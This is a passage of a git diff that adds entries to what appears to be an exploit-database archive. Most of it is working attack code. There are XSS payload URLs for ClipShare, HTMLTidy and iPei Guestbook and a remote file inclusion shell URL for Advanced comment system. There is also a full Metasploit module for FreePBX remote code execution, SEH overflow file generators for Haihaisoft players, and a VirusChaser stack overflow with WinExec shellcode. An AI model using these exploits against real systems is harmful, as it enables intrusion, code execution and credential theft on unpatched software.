affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ClipShare Pro 4.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32527.txt b/platforms/php/webapps/32527.txt new file mode 100755 index 000000000..aba4e9975 --- /dev/null +++ b/platforms/php/webapps/32527.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31908/info + +Adam Wright HTMLTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +HTMLTidy 0.5 is vulnerable; other versions may also be affected. Products that include HTMLTidy as a component will also be vulnerable. + +NOTE: This record was previously titled 'Kayako eSupport html-tidy-logic.php Cross Site Scripting Vulnerability'. It has been updated to properly describe the vulnerability as an HTMLTidy issue. + +http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2); \ No newline at end of file diff --git a/platforms/php/webapps/32528.txt b/platforms/php/webapps/32528.txt new file mode 100755 index 000000000..29e483a8b --- /dev/null +++ b/platforms/php/webapps/32528.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31911/info + +iPei Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/index.php?pg=c0d3_xss \ No newline at end of file diff --git a/platforms/php/webapps/9623.txt b/platforms/php/webapps/9623.txt index 943d05e22..f8c733a01 100755 --- a/platforms/php/webapps/9623.txt +++ b/platforms/php/webapps/9623.txt @@ -1,39 +1,39 @@ -====================================================== - - Advanced comment system1.0 Remote File Inclusion Vulnerability - - -<> Found by : kurdish hackers team - -<> C0ntact : pshela [at] YaHoo .com - -<> Groups : Kurd-Team - -<> site : www.kurdteam.org - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - -<<->> script :: Advanced_comment_system_1-0 - -<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> Exploit :: - - >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?] - /advanced_comment_system/admin.php?ACS_path=[shell.txt?] - - -======================================================= - -======================================================= - -<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team - -# milw0rm.com [2009-09-10] +====================================================== + + Advanced comment system1.0 Remote File Inclusion Vulnerability + + +<> Found by : kurdish hackers team + +<> C0ntact : pshela [at] YaHoo .com + +<> Groups : Kurd-Team + +<> site : www.kurdteam.org + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + +<<->> script :: Advanced_comment_system_1-0 + +<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> Exploit :: + + >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?] + /advanced_comment_system/admin.php?ACS_path=[shell.txt?] + + +======================================================= + +======================================================= + +<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team + +# milw0rm.com [2009-09-10] diff --git a/platforms/unix/remote/32512.rb b/platforms/unix/remote/32512.rb new file mode 100755 index 000000000..566a514c9 --- /dev/null +++ b/platforms/unix/remote/32512.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "FreePBX config.php Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11. + It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php" + parameters "function" and "args". + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'i-Hmx', # Vulnerability discovery + '0x00string', # PoC + 'xistence ' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-1903'], + ['OSVDB', '103240'], + ['EDB', '32214'], + ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['FreePBX', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Mar 21 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/']) + ], self.class) + + register_advanced_options( + [ + OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru']) + ], self.class) + end + + + def check + vprint_status("#{peer} - Trying to detect installed version") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "admin", "CHANGES") + }) + + if res and res.code == 200 and res.body =~ /^(.*)$/ + version = $1 + else + return Exploit::CheckCode::Unknown + end + + vprint_status("#{peer} - Version #{version} detected") + + if version =~ /2\.(9|10|11)\.0/ + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + def exploit + rand_data = rand_text_alpha_lower(rand(10) + 5) + + print_status("#{peer} - Sending payload") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), + 'vars_get' => { + "display" => rand_data, + "handler" => "api", + "function" => datastore['PHPFUNC'], + "args" => payload.encoded + } + }) + + # If we don't get a 200 when we request our malicious payload, we suspect + # we don't have a shell, either. + if res and res.code != 200 + print_error("#{peer} - Unexpected response, exploit probably failed!") + end + + end + +end \ No newline at end of file diff --git a/platforms/windows/dos/32513.py b/platforms/windows/dos/32513.py new file mode 100755 index 000000000..ce2fe1756 --- /dev/null +++ b/platforms/windows/dos/32513.py @@ -0,0 +1,56 @@ +?#-----------------------------------------------------------------------------# +# Exploit Title: Haihaisoft HUPlayer 1.0.4.8 - Buffer Overflow (SEH) # +# Date: Mar 25 2014 # +# Exploit Author: Gabor Seljan # +# Software Link: http://www.haihaisoft.com/huplayer.aspx # +# Version: 1.0.4.8 # +# Tested on: Windows XP SP3 # +#-----------------------------------------------------------------------------# + +# (59c.5c4): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=00000003 ebx=0141897a ecx=44444444 edx=01e28c98 esi=01e28c99 edi=01e28367 +# eip=0044754f esp=01e27b3c ebp=0000079d iopl=0 nv up ei pl nz na po nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +# *** ERROR: Module load completed but symbols could not be loaded for mpc-hc.exe +# mpc_hc+0x4754f: +# 0044754f 3b69f4 cmp ebp,dword ptr [ecx-0Ch] ds:0023:44444438=???????? +# 0:005> g +# (59c.5c4): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 +# eip=43434343 esp=01e2776c ebp=01e2778c iopl=0 nv up ei pl zr na pe nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +# 43434343 ?? ??? +# 0:005> !exchain +# 01e27780: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc) +# 01e28b68: 43434343 +# Invalid exception stack at 42424242 + +#!/usr/bin/python + +junk1 = "\x80" * 50; +offset = "\x41" * 1595; +nSEH = "\x42" * 4; +SEH = "\x43" * 4; +junk2 = "\x44" * 5000; + +evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals()) + +for e in ['m3u', 'pls', 'asx']: + if e is 'm3u': + poc = evil + elif e is 'pls': + poc = "[playlist]\nFile1={}".format(evil) + else: + poc = "".format(evil) + try: + print("[*] Creating poc.%s file..." % e) + f = open('poc.%s' % e, 'w') + f.write(poc) + f.close() + print("[*] %s file successfully created!" % f.name) + except: + print("[!] Error while creating exploit file!") \ No newline at end of file diff --git a/platforms/windows/dos/32514.py b/platforms/windows/dos/32514.py new file mode 100755 index 000000000..e6a1de1fd --- /dev/null +++ b/platforms/windows/dos/32514.py @@ -0,0 +1,57 @@ +?#-----------------------------------------------------------------------------# +# Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH) # +# Date: Mar 25 2014 # +# Exploit Author: Gabor Seljan # +# Software Link: http://www.haihaisoft.com/hup.aspx # +# Version: 1.5.8.0 # +# Tested on: Windows XP SP3 # +#-----------------------------------------------------------------------------# + +# (6ec.57c): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448 +# eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0 nv up ei pl nz na pe nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +# *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe +# mplayerc+0x29537f: +# 0069537f f3ab rep stos dword ptr es:[edi] +# 0:005> g +# (6ec.57c): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 +# eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0 nv up ei pl zr na pe nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +# 43434343 ?? ??? +# 0:005> !exchain +# 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc) +# 04cb7b4c: mplayerc+2e2e78 (006e2e78) +# 04cb8b80: 43434343 +# Invalid exception stack at 42424242 + +#!/usr/bin/python + +junk1 = "\x80" * 50; +offset = "\x41" * 1591; +nSEH = "\x42" * 4; +SEH = "\x43" * 4; +junk2 = "\x44" * 5000; + +evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals()) + +for e in ['m3u', 'pls', 'asx']: + if e is 'm3u': + poc = evil + elif e is 'pls': + poc = "[playlist]\nFile1={}".format(evil) + else: + poc = "".format(evil) + try: + print("[*] Creating poc.%s file..." % e) + f = open('poc.%s' % e, 'w') + f.write(poc) + f.close() + print("[*] %s file successfully created!" % f.name) + except: + print("[!] Error while creating exploit file!") \ No newline at end of file diff --git a/platforms/windows/dos/32522.py b/platforms/windows/dos/32522.py new file mode 100755 index 000000000..a8b2f5bc2 --- /dev/null +++ b/platforms/windows/dos/32522.py @@ -0,0 +1,37 @@ +# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow +# Date: 2014/03/26 +# Exploit Author: wh1ant +# Vendor Homepage: https://www.viruschaser.com/ +# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip +# Version: 8.0 +# Tested on: Windows 7 ultimate K +# +# You must have administrator permission to run + +from struct import pack +import os + +shellcode = "\x66\x83\xc4\x10" # add esp, 0x10 +shellcode += "\xb8\x50\x70\x50\x50" # mov eax, 0x50507050 +shellcode += "\xb9\x4e\x7d\x04\x27" # mov ecx, 0x27047d4e +shellcode += "\x03\xc1" # add eax, ecx ; WinExec() address +shellcode += "\x68\x63\x6d\x64\x01" # push 0x01646D63 +shellcode += "\x66\xb9\x50\x50" # add cx, 0x5050 +shellcode += "\x66\x81\xc1\xb0\xaf" # add cx, 0xafb0 +shellcode += "\x88\x4c\x24\x03" # mov [esp+3], cl +shellcode += "\x8b\xd4" # mov edx, esp +shellcode += "\x66\x51" # push cx +shellcode += "\x41" # inc cx +shellcode += "\x66\x51" # push cx +shellcode += "\x52" # push edx +shellcode += "\x50" # push eax +shellcode += "\x50" # push eax +shellcode += "\xc3\x90" # retn ; WinExec() + +# BOF retn: 0x0040753d + +pay = shellcode +pay = pay.rjust(520, "\x90") +pay += "\x9c\xdb\x12" + +os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"") diff --git a/platforms/windows/remote/32517.html b/platforms/windows/remote/32517.html new file mode 100755 index 000000000..c43bc5022 --- /dev/null +++ b/platforms/windows/remote/32517.html @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/31855/info + +Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. + +Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible. + + + + + + + diff --git a/platforms/windows/remote/32518.txt b/platforms/windows/remote/32518.txt new file mode 100755 index 000000000..17b38cba1 --- /dev/null +++ b/platforms/windows/remote/32518.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31855/info + +Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol. + +Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible. + + + + + + \ No newline at end of file